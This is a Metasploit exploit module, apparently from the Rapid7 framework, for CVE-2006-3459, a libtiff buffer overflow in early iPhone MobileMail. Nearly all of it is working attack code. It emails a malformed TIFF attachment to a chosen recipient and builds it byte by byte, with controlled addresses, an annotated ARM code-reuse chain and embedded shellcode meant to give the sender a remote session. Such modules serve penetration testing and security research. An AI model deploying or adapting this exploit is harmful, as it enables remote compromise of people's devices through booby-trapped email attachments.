##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  #
  # This module sends email messages via smtp
  #
  include Msf::Exploit::Remote::SMTPDeliver

  # Registers the module's metadata with the framework: name, description,
  # references, payload constraints, the single target (with its 'Heap' and
  # 'Magic' addresses consumed by generate_tiff) and the reliability notes.
  #
  # @param info [Hash] metadata merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apple iOS MobileMail LibTIFF Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in the version of
          libtiff shipped with firmware versions 1.00, 1.01, 1.02, and
          1.1.1 of the Apple iPhone. iPhones which have not had the BSD
          tools installed will need to use a special payload.
        },
        'License' => MSF_LICENSE,
        'Author' => ['hdm', 'kf'],
        'References' => [
          ['CVE', '2006-3459'],
          ['OSVDB', '27723'],
          ['BID', '19283']
        ],
        # Passive: the module delivers a message and then waits for a session
        # rather than connecting to the target itself.
        'Stance' => Msf::Exploit::Stance::Passive,
        'Payload' => {
          # 1800 bytes fits inside the 2048-byte data blob built in
          # generate_tiff (payload is written at offset 196; 196 + 1800 < 2048).
          'Space' => 1800,
          'BadChars' => '',
          'Compat' => {
            'ConnectionType' => '-bind -find'
          }
        },
        'Arch' => ARCH_ARMLE,
        'Platform' => %w[osx],
        'Targets' => [
          [
            'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',
            {
              'Platform' => 'osx',

              # Scratch space for our shellcode and stack
              'Heap' => 0x00802000,

              # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib
              'Magic' => 0x300d562c
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2006-08-01',
        'Notes' => {
          'Stability' => [ CRASH_SERVICE_DOWN ],
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ UNRELIABLE_SESSION ]
        }
      )
    )
  end

  # Returns false; presumably opts this passive module out of the framework's
  # automatic module selection (confirm against Msf::Exploit#autofilter).
  #
  # @return [Boolean] always false
  def autofilter
    false
  end

  # Builds a MIME message carrying a short random text part plus the
  # malformed TIFF as an attachment with a random image-style filename,
  # delivers it through SMTPDeliver#send_message, and then backgrounds
  # while waiting for a payload session.
  #
  # Reads datastore['SUBJECT'] (random alpha string if unset),
  # datastore['MAILTO'] and datastore['MAILFROM'].
  def exploit
    exts = ['jpg', 'tiff', 'tif']

    # Pick one extension at random so the attachment name varies per run.
    gext = exts[rand(exts.length)]
    data = Rex::Text.rand_text_alpha(1..32)
    tiff = generate_tiff(target)

    msg = Rex::MIME::Message.new
    msg.mime_defaults
    msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(1..32)
    msg.to = datastore['MAILTO']
    msg.from = datastore['MAILFROM']

    msg.add_part(Rex::Text.encode_base64(data, "\r\n"), 'text/plain', 'base64', 'inline')
    msg.add_part_attachment(tiff, rand_text_alpha(1..32) + '.' + gext)

    send_message(msg.to_s)

    print_status('Waiting for a payload session (backgrounding)...')
  end

  # Generates the TIFF file delivered as the attachment.
  #
  # The fixed header below is a little-endian ("II") TIFF with one IFD of
  # eight entries; `lolz` is packed into the count field of the last entry,
  # which appears to be the oversized value the referenced libtiff bug
  # mishandles. It is followed by `lolz` bytes of random data into which the
  # target's 'Magic' and 'Heap'-derived addresses are written at fixed
  # offsets, and the encoded payload is placed at offset 196.
  #
  # @param targ [Hash] target definition; reads targ['Magic'] and targ['Heap']
  # @return [String] the complete TIFF bytes (header followed by the data blob)
  def generate_tiff(targ)
    #
    # This is a TIFF file, we have a huge range of evasion
    # capabilities, but for now, we don't use them.
    # - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday
    #

    # Length of the trailing random data; also used as the IFD entry count below.
    lolz = 2048
    tiff = "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"
    tiff << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    tiff << "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"
    tiff << "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"
    tiff << "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"
    tiff << "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"
    tiff << "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"
    tiff << "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"
    tiff << "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"
    tiff << "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"
    # Count field of the final IFD entry (tag 0x0150), little-endian 32-bit.
    tiff << [lolz].pack('V')
    # Value/offset field of that entry (0x84), then a zero next-IFD pointer.
    tiff << "\x84\x00\x00\x00\x00\x00\x00\x00"

    # Randomize the bajeezus out of our data
    hehe = rand_text(lolz)

    # Were going to candy mountain!
    hehe[120, 4] = [targ['Magic']].pack('V')

    # >> add r0, r4, #0x30
    hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack('V')

    # Candy mountain, Charlie!
    # >> mov r1, sp

    # It will be an adventure!
    # >> mov r2, r8
    # Total length of the data blob (== lolz) written at offset 92.
    hehe[92, 4] = [ hehe.length ].pack('V')

    # Its a magic leoplurodon!
    # It has spoken!
    # It has shown us the way!
    # >> bl _memcpy

    # Its just over this bridge, Charlie!
    # This magical bridge!
    # >> ldr r3, [r4, #32]
    # >> ldrt r3, [pc], r3, lsr #30
    # >> str r3, [r4, #32]
    # >> ldr r3, [r4, #36]
    # >> ldrt r3, [pc], r3, lsr #30
    # >> str r3, [r4, #36]
    # >> ldr r3, [r4, #40]
    # >> ldrt r3, [pc], r3, lsr #30
    # >> str r3, [r4, #40]
    # >> ldr r3, [r4, #44]
    # >> ldrt r3, [pc], r3, lsr #30
    # >> str r3, [r4, #44]

    # We made it to candy mountain!
    # Go inside Charlie!
    # sub sp, r7, #0x14
    hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack('V')

    # Goodbye Charlie!
    # ;; targ['Heap'] + 0x48 becomes the stack pointer
    # >> ldmia sp!, {r8, r10}

    # Hey, what the...!
    # >> ldmia sp!, {r4, r5, r6, r7, pc}

    # Return back to the copied heap data
    hehe[192, 4] = [ targ['Heap'] + 196 ].pack('V')

    # Insert our actual shellcode at heap location + 196
    # NOTE(review): relies on 'Payload' => 'Space' (1800) keeping this inside
    # the lolz-byte blob; a larger payload would grow hehe past lolz.
    hehe[196, payload.encoded.length] = payload.encoded

    # Header + data blob is the method's return value.
    tiff << hehe
  end
end